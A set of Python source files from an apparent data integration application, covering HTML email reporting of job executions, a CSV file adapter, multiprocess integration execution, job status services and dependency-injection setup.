from infrastructor.configuration.ConfigService import ConfigService
from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager
from infrastructor.data.Repository import Repository
from infrastructor.delivery.EmailProvider import EmailProvider
from infrastructor.dependency.scopes import IScoped
from infrastructor.logging.SqlLogger import SqlLogger
from models.configs.ApplicationConfig import ApplicationConfig
from models.dao.common import OperationEvent
from models.dao.common.Log import Log
from models.dao.common.Status import Status
from models.dao.operation import DataOperationJobExecution, DataOperationJob
from models.dao.operation.DataOperationJobExecutionEvent import DataOperationJobExecutionEvent
from models.enums.events import EVENT_EXECUTION_INITIALIZED
class EmailService(IScoped):
@inject
def __init__(self,
database_session_manager: DatabaseSessionManager,
sql_logger: SqlLogger,
email_provider: EmailProvider,
config_service: ConfigService,
application_config: ApplicationConfig
):
self.application_config: ApplicationConfig = application_config
self.database_session_manager = database_session_manager
self.sql_logger: SqlLogger = sql_logger
self.email_provider = email_provider
self.config_service = config_service
@property
def default_css(self):
return '''
.wrapper{
margin: 0 auto;
padding: 20px;
max-width: 1000px;
}
.container600 {
width: 300px;
max-width: 100%;
}
@media all and (max-width: 600px) {
.container600 {
width: 100% !important;
}
}
.col49 {
width: 49%;
}
.col2 {
width: 2%;
}
.col50 {
width: 50%;
}
@media all and (max-width: 599px) {
.fluid {
width: 100% !important;
}
.reorder {
width: 100% !important;
margin: 0 auto 10px;
}
.ghost-column {
display:none;
height:0;
width:0;
overflow:hidden;
max-height:0;
max-width:0;
}
}
.mail-column{
text-align: left;
padding:4px;
font-family: Arial,sans-serif;
font-size: 12px;
line-height:10px;
}
.mail-row{
text-align: left;
padding:4px;
font-family: Arial,sans-serif;
font-size: 10px;
line-height:10px;
}
.mail-row-nowrap{
white-space: nowrap;
}
table {
border-collapse: collapse;
width: 100%;
}
th, td {
text-align: left;
padding: 8px;
}
tr:nth-child(even) {background-color: #f2f2f2;}
'''
def mail_html_template(self, body, mail_css=None):
css = mail_css if mail_css is not None else self.default_css
template = f'''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title></title>
<style>{css}</style>
</head>
<body>
{body}
</body>
</html>
'''
return template
def get_dict_value(self, dict, key):
if key in dict:
return dict[key]
return ''
def prepare_table(self, columns: List[str], rows: List[any], width):
headers = ''
for column in columns:
column_style = self.get_dict_value(column, 'style')
column_class = self.get_dict_value(column, 'class')
column_value = self.get_dict_value(column, 'value')
headers = headers + f'<th scope="col" style="{column_style}" class="mail-column {column_class}">{column_value}</th>'
bodies = ''
for row in rows:
bodies = bodies + '<tr>'
for data in row['data']:
row_style = self.get_dict_value(data, 'style')
row_class = self.get_dict_value(data, 'class')
row_value = self.get_dict_value(data, 'value')
bodies = bodies + f'<td valign="top" style="{row_style}" class="mail-row {row_class}">{row_value}</td>'
bodies = bodies + '</tr>'
table_width = width if width is not None else '100%'
table = f'''
<table width="{table_width}" cellpadding="0" cellspacing="0" style="min-width:100%;">
<thead>
{headers}
</thead>
<tbody>
{bodies}
</tbody>
</table>
'''
return table
def add_default_contacts(self, operation_contacts):
default_contacts = self.config_service.get_config_by_name("DataOperationDefaultContact")
if default_contacts is not None and default_contacts != '':
default_contacts_emails = default_contacts.split(",")
for default_contact in default_contacts_emails:
if default_contact is not None and default_contact != '':
operation_contacts.append(default_contact)
def send_data_operation_finish_mail(self,
data_operation_job_execution_id,
data_operation_job_execution_status_id,
data_operation_name,
operation_contacts,
execution_table_data,
execution_event_table_data,
execution_integration_table_data
):
self.add_default_contacts(operation_contacts=operation_contacts)
if operation_contacts is None:
self.sql_logger.info(f'{data_operation_job_execution_id} mail sending contact not found',
job_id=data_operation_job_execution_id)
return
subject = f"Execution completed"
if data_operation_job_execution_status_id == 3:
subject = subject + " successfully"
elif data_operation_job_execution_status_id == 4:
subject = subject + " with error"
subject = subject + f": {self.application_config.environment} » {data_operation_name} » {data_operation_job_execution_id}"
execution_table = self.prepare_table(columns=execution_table_data['columns'],
rows=execution_table_data['rows'],
width=800)
# execution_event_table = self.prepare_table(columns=execution_event_table_data['columns'],
# rows=execution_event_table_data['rows'],
# width=400)
execution_integration_table = self.prepare_table(columns=execution_integration_table_data['columns'],
rows=execution_integration_table_data['rows'],
width=None)
# <div style="font-size: 24px;"><b>Data Operation Events</b></div>
# {execution_event_table}
body_content = f'''
<div class="wrapper">
<div style="font-size: 24px;"><b>Data Operation </b></div>
{execution_table}
<div style="font-size: 24px;"><b>Data Operation Integrations</b></div>
{execution_integration_table}
</div>
'''
mail_body = self.mail_html_template(body_content)
try:
self.email_provider.send(operation_contacts, subject, mail_body)
self.sql_logger.error(f"Mail Sent successfully.", job_id=data_operation_job_execution_id)
except Exception as ex:
self.sql_logger.error(f"Error on mail sending. Error:{ex}", job_id=data_operation_job_execution_id)
```
#### File: integration/services/DataIntegrationConnectionQueueService.py
```python
from injector import inject
from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager
from infrastructor.data.Repository import Repository
from infrastructor.dependency.scopes import IScoped
from models.dao.integration import DataIntegrationConnectionQueue
from models.dao.integration.DataIntegrationConnection import DataIntegrationConnection
from models.viewmodels.integration.CreateDataIntegrationConnectionQueueModel import \
CreateDataIntegrationConnectionQueueModel
class DataIntegrationConnectionQueueService(IScoped):
@inject
def __init__(self,
database_session_manager: DatabaseSessionManager,
):
self.database_session_manager = database_session_manager
self.data_integration_connection_queue_repository: Repository[DataIntegrationConnectionQueue] = \
Repository[DataIntegrationConnectionQueue](database_session_manager)
#######################################################################################
def get_by_id(self, id: int) -> DataIntegrationConnectionQueue:
entity = self.data_integration_connection_queue_repository.first(IsDeleted=0,
Id=id,
)
return entity
def get_by_data_integration_connection_id(self,
data_integration_connection_id: int) -> DataIntegrationConnectionQueue:
entity = self.data_integration_connection_queue_repository.first(IsDeleted=0,
DataIntegrationConnectionId=data_integration_connection_id,
)
return entity
def insert(self,
data_integration_connection: DataIntegrationConnection,
data: CreateDataIntegrationConnectionQueueModel) -> DataIntegrationConnectionQueue:
data_integration_connection_queue = DataIntegrationConnectionQueue(TopicName=data.TopicName,
DataIntegrationConnection=data_integration_connection)
self.data_integration_connection_queue_repository.insert(data_integration_connection_queue)
return data_integration_connection_queue
def update(self,
data_integration_connection: DataIntegrationConnection,
data: CreateDataIntegrationConnectionQueueModel) -> DataIntegrationConnectionQueue:
data_integration_connection_queue = self.get_by_data_integration_connection_id(
data_integration_connection_id=data_integration_connection.Id,
)
data_integration_connection_queue.DataIntegrationConnection = data_integration_connection
data_integration_connection_queue.TopicName = data.TopicName
return data_integration_connection_queue
def delete(self, id: int):
entity = self.get_by_id(id=id)
if entity is not None:
self.data_integration_connection_queue_repository.delete_by_id(id)
```
#### File: adapters/connection/FileAdapter.py
```python
import multiprocessing
import os
from queue import Queue
from typing import List
from injector import inject
import pandas as pd
from pandas import DataFrame
from domain.operation.execution.services.OperationCacheService import OperationCacheService
from infrastructor.connection.adapters.ConnectionAdapter import ConnectionAdapter
from infrastructor.connection.file.FileProvider import FileProvider
from infrastructor.exceptions.NotSupportedFeatureException import NotSupportedFeatureException
from infrastructor.logging.SqlLogger import SqlLogger
from models.dto.PagingModifier import PagingModifier
class FileAdapter(ConnectionAdapter):
@inject
def __init__(self,
sql_logger: SqlLogger,
file_provider: FileProvider,
operation_cache_service: OperationCacheService,
):
self.operation_cache_service = operation_cache_service
self.sql_logger = sql_logger
self.file_provider = file_provider
def clear_data(self, data_integration_id) -> int:
target_connection = self.operation_cache_service.get_target_connection(
data_integration_id=data_integration_id)
target_context = self.file_provider.get_context(
connection=target_connection.Connection)
data_integration_columns = self.operation_cache_service.get_columns_by_integration_id(
data_integration_id=data_integration_id)
file_path = os.path.join(target_connection.File.Folder, target_connection.File.FileName)
if target_connection.File.Csv.HasHeader:
if target_connection.File.Csv.Header is not None and target_connection.File.Csv.Header != '':
headers = target_connection.File.Csv.Header.split(target_connection.File.Csv.Separator)
else:
headers = [(data_integration_column.TargetColumnName) for data_integration_column in
data_integration_columns]
truncate_affected_rowcount = target_context.recreate_file(
file=file_path, headers=headers,
separator=target_connection.File.Csv.Separator)
else:
truncate_affected_rowcount = target_context.delete_file(
file=file_path)
return truncate_affected_rowcount
def get_source_data_count(self, data_integration_id) -> int:
return -1
def start_source_data_operation(self,
data_integration_id: int,
data_operation_job_execution_integration_id: int,
limit: int,
process_count: int,
data_queue: Queue,
data_result_queue: Queue):
source_connection = self.operation_cache_service.get_source_connection(
data_integration_id=data_integration_id)
source_context = self.file_provider.get_context(connection=source_connection.Connection)
has_header = None
if source_connection.File.Csv.HasHeader:
has_header = 0
headers = None
separator = source_connection.File.Csv.Separator
if source_connection.File.Csv.Header is not None and source_connection.File.Csv.Header != '':
headers = source_connection.File.Csv.Header.split(separator)
if source_connection.File.FileName is not None and source_connection.File.FileName != '':
file_path = source_context.get_file_path(folder_name=source_connection.File.Folder,
file_name=source_connection.File.FileName)
source_context.get_unpredicted_data(file=file_path,
names=headers,
header=has_header,
separator=separator,
limit=limit,
process_count=process_count,
data_queue=data_queue,
result_queue=data_result_queue)
else:
csv_files = source_context.get_all_files(folder_name=source_connection.File.Folder, file_regex='(.*csv$)')
for csv_file in csv_files:
self.sql_logger.info(f"file read started. FilePath:{csv_file} ")
source_context.get_unpredicted_data(file=csv_file,
names=headers,
header=has_header,
separator=separator,
limit=limit,
process_count=process_count,
data_queue=data_queue,
result_queue=data_result_queue)
def get_source_data(self, data_integration_id: int, paging_modifier: PagingModifier) -> DataFrame:
source_connection = self.operation_cache_service.get_source_connection(
data_integration_id=data_integration_id)
source_context = self.file_provider.get_context(connection=source_connection.Connection)
data_integration_columns = self.operation_cache_service.get_columns_by_integration_id(
data_integration_id=data_integration_id)
has_header = None
if source_connection.File.Csv.HasHeader:
has_header = 0
headers = None
if source_connection.File.Csv.Header is not None and source_connection.File.Csv.Header != '':
headers = source_connection.File.Csv.Header.split(source_connection.File.Csv.Separator)
file_path = os.path.join(source_connection.File.Folder, source_connection.File.FileName)
readed_data = source_context.get_data(file=file_path,
names=headers,
header=has_header,
start=paging_modifier.Start,
limit=paging_modifier.Limit,
separator=source_connection.File.Csv.Separator)
column_names = [(data_integration_column.SourceColumnName) for data_integration_column in
data_integration_columns]
data = readed_data[column_names]
replaced_data = data.where(pd.notnull(data), None)
return replaced_data.values.tolist()
def prepare_insert_row(self, data, columns):
insert_rows = []
for extracted_data in data:
row = []
for column in columns:
column_data = extracted_data[column]
row.append(column_data)
insert_rows.append(tuple(row))
return insert_rows
def prepare_data(self, data_integration_id: int, source_data: DataFrame) -> List[any]:
data_integration_columns = self.operation_cache_service.get_columns_by_integration_id(
data_integration_id=data_integration_id)
source_columns = [(data_integration_column.SourceColumnName) for data_integration_column in
data_integration_columns]
if isinstance(source_data, pd.DataFrame):
data = source_data[source_columns]
prepared_data = data.values.tolist()
else:
prepared_data = self.prepare_insert_row(data=source_data, columns=source_columns)
return prepared_data
def write_target_data(self, data_integration_id: int, prepared_data: List[any], ) -> int:
target_connection = self.operation_cache_service.get_target_connection(
data_integration_id=data_integration_id)
target_context = self.file_provider.get_context(connection=target_connection.Connection)
df = pd.DataFrame(prepared_data)
data = df.where(pd.notnull(df), None)
file_path = os.path.join(target_connection.File.Folder, target_connection.File.FileName)
affected_row_count = target_context.write_to_file(file=file_path,
data=data,
separator=target_connection.File.Csv.Separator)
return affected_row_count
def do_target_operation(self, data_integration_id: int) -> int:
raise NotSupportedFeatureException("File Target Operation")
```
#### File: execution/processes/ExecuteIntegrationProcess.py
```python
import multiprocessing
import traceback
from queue import Queue
from time import time
from injector import inject
from pandas import DataFrame, notnull
import pandas as pd
from domain.operation.execution.services.OperationCacheService import OperationCacheService
from infrastructor.data.decorators.TransactionHandler import transaction_handler
from infrastructor.multi_processing.ProcessManager import ProcessManager
from domain.operation.execution.services.IntegrationExecutionService import IntegrationExecutionService
from IocManager import IocManager
from infrastructor.connection.models.DataQueueTask import DataQueueTask
from infrastructor.dependency.scopes import IScoped
from infrastructor.logging.SqlLogger import SqlLogger
from models.dto.PagingModifier import PagingModifier
class ExecuteIntegrationProcess(IScoped):
@inject
def __init__(self,
sql_logger: SqlLogger,
operation_cache_service: OperationCacheService,
integration_execution_service: IntegrationExecutionService):
self.operation_cache_service = operation_cache_service
self.integration_execution_service = integration_execution_service
self.sql_logger = sql_logger
@staticmethod
def start_source_data_process(sub_process_id,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
limit: int,
process_count: int,
data_queue: Queue,
data_result_queue: Queue):
return IocManager.injector.get(ExecuteIntegrationProcess).start_source_data_operation(
sub_process_id=sub_process_id,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
limit=limit,
process_count=process_count,
data_queue=data_queue,
data_result_queue=data_result_queue,
)
@transaction_handler
def start_source_data_operation(self, sub_process_id,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
limit: int,
process_count: int,
data_queue: Queue,
data_result_queue: Queue):
self.operation_cache_service.create_data_integration(data_integration_id=data_integration_id)
self.sql_logger.info(f"Source Data started on process. SubProcessId: {sub_process_id}",
job_id=data_operation_job_execution_id)
try:
self.integration_execution_service.start_source_data_operation(
data_integration_id=data_integration_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
limit=limit,
process_count=process_count,
data_queue=data_queue,
data_result_queue=data_result_queue)
for i in range(process_count):
data_queue_finish_task = DataQueueTask(IsFinished=True)
data_queue.put(data_queue_finish_task)
except Exception as ex:
for i in range(process_count):
data_queue_error_task = DataQueueTask(IsFinished=True, Traceback=traceback.format_exc(), Exception=ex)
data_queue.put(data_queue_error_task)
raise
@staticmethod
def start_execute_data_process(sub_process_id,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_queue: Queue,
data_result_queue: Queue) -> int:
return IocManager.injector.get(ExecuteIntegrationProcess).start_execute_data_operation(
sub_process_id=sub_process_id,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
data_queue=data_queue,
data_result_queue=data_result_queue,
)
@transaction_handler
def start_execute_data_operation_on_process(self,
sub_process_id: int,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_queue: Queue,
data_result_queue: Queue) -> int:
return IocManager.injector.get(ExecuteIntegrationProcess).start_execute_data_operation(
sub_process_id=sub_process_id,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
data_queue=data_queue,
data_result_queue=data_result_queue,
)
def start_execute_data_operation(self,
sub_process_id: int,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_queue: Queue,
data_result_queue: Queue) -> int:
self.operation_cache_service.create_data_integration(data_integration_id=data_integration_id)
total_row_count = 0
try:
while True:
data_task: DataQueueTask = data_queue.get()
if data_task.IsFinished:
if data_task.Exception is not None:
exc = Exception(data_task.Traceback + '\n' + str(data_task.Exception))
raise exc
self.sql_logger.info(f"{sub_process_id} process tasks finished",
job_id=data_operation_job_execution_id)
return total_row_count
else:
start = time()
data = data_task.Data
paging_modifier = PagingModifier(Id=data_task.Id, End=data_task.End, Start=data_task.Start,
Limit=data_task.Limit)
if data_task.IsDataFrame and data is not None:
source_data_json = data_task.Data
data: DataFrame = DataFrame(source_data_json)
data_count = 0
if data is None:
self.sql_logger.info(
f"{sub_process_id}-{data_task.Message}:{data_task.Id}-{data_task.Start}-{data_task.End} process got a new task",
job_id=data_operation_job_execution_id)
data_count = self.integration_execution_service.start_execute_integration(
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
paging_modifier=paging_modifier,
source_data=data)
elif data is not None and len(data) > 0:
if data_task.IsDataFrame and data_task.DataTypes is not None:
source_data = data.astype(dtype=data_task.DataTypes)
else:
source_data = data
if data_task.IsDataFrame:
source_data = source_data.where(notnull(data), None)
source_data = source_data.replace({pd.NaT: None})
self.sql_logger.info(
f"{sub_process_id}-{data_task.Message}:{data_task.Id}-{data_task.Start}-{data_task.End} process got a new task",
job_id=data_operation_job_execution_id)
data_count = self.integration_execution_service.start_execute_integration(
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
paging_modifier=paging_modifier,
source_data=source_data)
else:
self.sql_logger.info(
f"{sub_process_id}-{data_task.Message}:{data_task.Id}-{data_task.Start}-{data_task.End} process got an empty task",
job_id=data_operation_job_execution_id)
total_row_count = total_row_count + data_count
end = time()
self.sql_logger.info(
f"{sub_process_id}-{data_task.Message}:{data_task.Id}-{data_task.Start}-{data_task.End} process finished task. time:{end - start}",
job_id=data_operation_job_execution_id)
data_task.IsProcessed = True
data_result_queue.put(True)
return total_row_count
except Exception as ex:
data_result_queue.put(False)
raise
def start_source_data_subprocess(self,
source_data_process_manager: ProcessManager,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
limit: int,
process_count: int,
data_queue: Queue,
data_result_queue: Queue):
source_data_kwargs = {
"data_integration_id": data_integration_id,
"data_operation_job_execution_id": data_operation_job_execution_id,
"data_operation_job_execution_integration_id": data_operation_job_execution_integration_id,
"limit": limit,
"process_count": process_count,
"data_queue": data_queue,
"data_result_queue": data_result_queue,
}
source_data_process_manager.start_processes(
process_count=1,
target_method=self.start_source_data_process,
kwargs=source_data_kwargs)
def start_execute_data_subprocess(self, execute_data_process_manager: ProcessManager,
process_count: int,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_queue: Queue,
data_result_queue: Queue) -> int:
total_row_count = 0
execute_data_kwargs = {
"data_integration_id": data_integration_id,
"data_operation_job_execution_id": data_operation_job_execution_id,
"data_operation_job_execution_integration_id": data_operation_job_execution_integration_id,
"data_queue": data_queue,
"data_result_queue": data_result_queue,
}
execute_data_process_manager.start_processes(
process_count=process_count,
target_method=self.start_execute_data_process,
kwargs=execute_data_kwargs)
execute_data_process_results = execute_data_process_manager.get_results()
for result in execute_data_process_results:
if result.Exception is not None:
raise result.Exception
if result.Result is not None:
total_row_count = total_row_count + result.Result
return total_row_count
def start_integration_execution(self,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_operation_integration_id: int) -> int:
try:
data_operation_integration = self.operation_cache_service.get_data_operation_integration_by_id(
data_operation_integration_id=data_operation_integration_id)
if data_operation_integration.ProcessCount is not None and data_operation_integration.ProcessCount >= 1:
process_count = data_operation_integration.ProcessCount
else:
process_count = 1
data_integration_id = data_operation_integration.DataIntegrationId
limit = data_operation_integration.Limit
try:
manager = multiprocessing.Manager()
source_data_process_manager = ProcessManager()
execute_data_process_manager = ProcessManager()
data_queue = manager.Queue()
data_result_queue = manager.Queue()
self.start_source_data_subprocess(source_data_process_manager=source_data_process_manager,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
limit=limit,
process_count=process_count, data_queue=data_queue,
data_result_queue=data_result_queue)
if process_count > 1:
total_row_count = self.start_execute_data_subprocess(
execute_data_process_manager=execute_data_process_manager,
process_count=process_count,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
data_queue=data_queue,
data_result_queue=data_result_queue)
else:
total_row_count = self.start_execute_data_operation(sub_process_id=0,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
data_queue=data_queue,
data_result_queue=data_result_queue)
# total_row_count = self.integration_execution_service.start_integration(
# data_integration_id=data_integration_id,
# limit=limit,
# data_operation_job_execution_integration_id=data_operation_job_execution_integration_id)
finally:
manager.shutdown()
del source_data_process_manager
del execute_data_process_manager
return total_row_count
except Exception as ex:
self.sql_logger.error(f"Integration getting error.Error:{ex}", job_id=data_operation_job_execution_id)
raise
```
#### File: operation/services/DataOperationJobExecutionService.py
```python
from datetime import datetime
from typing import List
from injector import inject
from domain.delivery.EmailService import EmailService
from infrastructor.data.RepositoryProvider import RepositoryProvider
from infrastructor.data.decorators.TransactionHandler import transaction_handler
from infrastructor.dependency.scopes import IScoped
from infrastructor.logging.SqlLogger import SqlLogger
from models.dao.common import OperationEvent
from models.dao.common.Status import Status
from models.dao.integration import DataIntegrationConnection
from models.dao.operation import DataOperationJobExecution, DataOperationJobExecutionIntegration, \
DataOperationIntegration
from models.dao.operation.DataOperationJobExecutionEvent import DataOperationJobExecutionEvent
class DataOperationJobExecutionService(IScoped):
@inject
def __init__(self,
repository_provider: RepositoryProvider,
sql_logger: SqlLogger,
email_service: EmailService
):
self.repository_provider = repository_provider
self.data_operation_job_execution_repository = repository_provider.get(DataOperationJobExecution)
self.data_operation_job_execution_integration_repository = repository_provider.get(
DataOperationJobExecutionIntegration)
self.status_repository = repository_provider.get(Status)
self.operation_event_repository = repository_provider.get(OperationEvent)
self.data_operation_job_execution_event_repository = repository_provider.get(DataOperationJobExecutionEvent)
self.data_integration_connection_repository = repository_provider.get(DataIntegrationConnection)
self.email_service = email_service
self.sql_logger: SqlLogger = sql_logger
def update_status(self, data_operation_job_execution_id: int = None,
status_id: int = None, is_finished: bool = False):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
status = self.status_repository.first(Id=status_id)
if is_finished:
data_operation_job_execution.EndDate = datetime.now()
data_operation_job_execution.Status = status
self.repository_provider.commit()
return data_operation_job_execution
def create_event(self, data_operation_execution_id,
event_code) -> DataOperationJobExecutionEvent:
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_execution_id)
operation_event = self.operation_event_repository.first(Code=event_code)
data_operation_job_execution_event = DataOperationJobExecutionEvent(
EventDate=datetime.now(),
DataOperationJobExecution=data_operation_job_execution,
Event=operation_event)
self.data_operation_job_execution_event_repository.insert(data_operation_job_execution_event)
self.repository_provider.commit()
return data_operation_job_execution_event
def prepare_execution_table_data(self, data_operation_job_execution_id):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
columns = [
{'value': 'Execution Id'},
{'value': 'Name'},
{'value': 'Status'},
{'value': 'Execution Start Date'},
{'value': 'Execution End Date'}
]
rows = [
{
'data':
[
{'value': data_operation_job_execution.Id},
{
'value': f'{data_operation_job_execution.DataOperationJob.DataOperation.Name} ({data_operation_job_execution.DataOperationJob.DataOperation.Id})'},
{'value': data_operation_job_execution.Status.Description},
{'value': data_operation_job_execution.StartDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'mail-row-nowrap'},
{'value': data_operation_job_execution.EndDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'mail-row-nowrap'}
]
}
]
return {'columns': columns, 'rows': rows}
def prepare_execution_event_table_data(self, data_operation_job_execution_id):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
job_execution_events: List[
DataOperationJobExecutionEvent] = data_operation_job_execution.DataOperationJobExecutionEvents
columns = [
{'value': 'Event Description'},
{'value': 'Event Date'}
]
rows = []
for job_execution_event in job_execution_events:
execution_operation_event: OperationEvent = job_execution_event.Event
row = {
"data": [
{'value': execution_operation_event.Description},
{'value': job_execution_event.EventDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'mail-row-nowrap'}
]
}
rows.append(row)
return {'columns': columns, 'rows': rows}
def prepare_execution_integration_table_data(self, data_operation_job_execution_id):
job_execution_integrations_query = self.repository_provider.create().session.query(
DataOperationJobExecutionIntegration, DataOperationIntegration
) \
.filter(DataOperationJobExecutionIntegration.DataOperationIntegrationId == DataOperationIntegration.Id) \
.filter(DataOperationJobExecutionIntegration.DataOperationJobExecutionId == data_operation_job_execution_id) \
.order_by(DataOperationIntegration.Order)
job_execution_integrations = job_execution_integrations_query.all()
columns = [
{'value': 'Order'},
{'value': 'Code'},
{'value': 'Source'},
{'value': 'Target'},
{'value': 'Status'},
{'value': 'Start Date'},
# {'value': 'End Date'},
{'value': 'Limit'},
{'value': 'Process Count'},
{'value': 'Source Data Count'},
{'value': 'Affected Row Count'},
{'value': 'Log'}
]
rows = []
for job_execution_integration_data in job_execution_integrations:
job_execution_integration = job_execution_integration_data.DataOperationJobExecutionIntegration
data_integration_id = job_execution_integration.DataOperationIntegration.DataIntegration.Id
source_connection = self.data_integration_connection_repository.table \
.filter(DataIntegrationConnection.IsDeleted == 0) \
.filter(DataIntegrationConnection.DataIntegrationId == data_integration_id) \
.filter(DataIntegrationConnection.SourceOrTarget == 0) \
.one_or_none()
target_connection = self.data_integration_connection_repository.table \
.filter(DataIntegrationConnection.IsDeleted == 0) \
.filter(DataIntegrationConnection.DataIntegrationId == data_integration_id) \
.filter(DataIntegrationConnection.SourceOrTarget == 1) \
.one_or_none()
source_data_count = 0
if job_execution_integration.SourceDataCount is not None and job_execution_integration.SourceDataCount > 0:
source_data_count = job_execution_integration.SourceDataCount
total_affected_row_count = 0
for event in job_execution_integration.DataOperationJobExecutionIntegrationEvents:
if event.AffectedRowCount is not None and event.AffectedRowCount > 0:
total_affected_row_count = total_affected_row_count + event.AffectedRowCount
source_connection_name = source_connection.Connection.Name if source_connection is not None else ''
target_connection_name = target_connection.Connection.Name if target_connection is not None else ''
row = {
"data": [
{'value': job_execution_integration.DataOperationIntegration.Order},
{'value': job_execution_integration.DataOperationIntegration.DataIntegration.Code},
{'value': source_connection_name},
{'value': target_connection_name},
{'value': job_execution_integration.Status.Description},
{'value': job_execution_integration.StartDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3] + '',
'class': 'mail-row-nowrap'
},
# {'value': job_execution_integration.EndDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
# },
{'value': job_execution_integration.Limit},
{'value': job_execution_integration.ProcessCount},
{'value': source_data_count},
{'value': total_affected_row_count},
{'value': job_execution_integration.Log}
]
}
rows.append(row)
return {'columns': columns, 'rows': rows}
@transaction_handler
def send_data_operation_finish_mail(self, data_operation_job_execution_id):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
if data_operation_job_execution is None:
self.sql_logger.info(f'{data_operation_job_execution_id} mail sending execution not found',
job_id=data_operation_job_execution_id)
return
operation_contacts = []
for contact in data_operation_job_execution.DataOperationJob.DataOperation.Contacts:
if contact.IsDeleted == 0:
operation_contacts.append(contact.Email)
data_operation_name = data_operation_job_execution.DataOperationJob.DataOperation.Name
execution_table_data = self.prepare_execution_table_data(
data_operation_job_execution_id=data_operation_job_execution_id)
execution_event_table_data = self.prepare_execution_event_table_data(
data_operation_job_execution_id=data_operation_job_execution_id)
execution_integration_table_data = self.prepare_execution_integration_table_data(
data_operation_job_execution_id=data_operation_job_execution_id)
self.email_service.send_data_operation_finish_mail(
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_status_id=data_operation_job_execution.StatusId,
data_operation_name=data_operation_name,
operation_contacts=operation_contacts,
execution_table_data=execution_table_data,
execution_event_table_data=execution_event_table_data,
execution_integration_table_data=execution_integration_table_data
)
```
#### File: src/process/IocManager.py
```python
import os
import sys
from multiprocessing.process import current_process
from injector import singleton, Injector, threadlocal, Binder
from sqlalchemy import MetaData
from sqlalchemy.ext.declarative import declarative_base
from infrastructor.dependency.scopes import ISingleton, IScoped
from infrastructor.logging.ConsoleLogger import ConsoleLogger
from infrastructor.utils.ConfigManager import ConfigManager
from infrastructor.utils.Utils import Utils
from models.configs.ApplicationConfig import ApplicationConfig
from models.configs.DatabaseConfig import DatabaseConfig
from models.configs.ProcessRpcServerConfig import ProcessRpcServerConfig
class IocManager:
binder: Binder = None
process_service = None
config_manager:ConfigManager = None
injector: Injector = None
Base = declarative_base(metadata=MetaData(schema='Common'))
@staticmethod
def initialize():
root_directory = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__))))
IocManager.configure_startup(root_directory)
@staticmethod
def set_process_service(process_service=None):
IocManager.process_service = process_service
# wrapper required for dependency
@staticmethod
def configure_startup(root_directory):
# Importing all modules for dependency
sys.path.append(root_directory)
folders = Utils.find_sub_folders(root_directory)
module_list, module_attr_list = Utils.get_modules(folders)
# Configuration initialize
IocManager.config_manager = ConfigManager(root_directory)
IocManager.set_database_application_name()
IocManager.process_info()
IocManager.injector = Injector(IocManager.configure)
@staticmethod
def set_database_application_name():
application_config = IocManager.config_manager.get(ApplicationConfig)
database_config: DatabaseConfig = IocManager.config_manager.get(DatabaseConfig)
if database_config.application_name is None:
process_info = IocManager.get_process_info()
hostname = os.getenv('HOSTNAME', '')
IocManager.config_manager.set(ApplicationConfig, "hostname", hostname)
IocManager.config_manager.set(DatabaseConfig, "application_name",
f"{application_config.name}-({process_info})")
@staticmethod
def run():
process_service = IocManager.process_service()
process_rpc_server_config: ProcessRpcServerConfig = IocManager.config_manager.get(ProcessRpcServerConfig)
process_service.initialize(process_rpc_server_config=process_rpc_server_config)
@staticmethod
def configure(binder: Binder):
IocManager.binder = binder
for config in IocManager.config_manager.get_all():
binder.bind(
config.get("type"),
to=config.get("instance"),
scope=singleton,
)
for singletonScope in ISingleton.__subclasses__():
binder.bind(
singletonScope,
to=singletonScope,
scope=singleton,
)
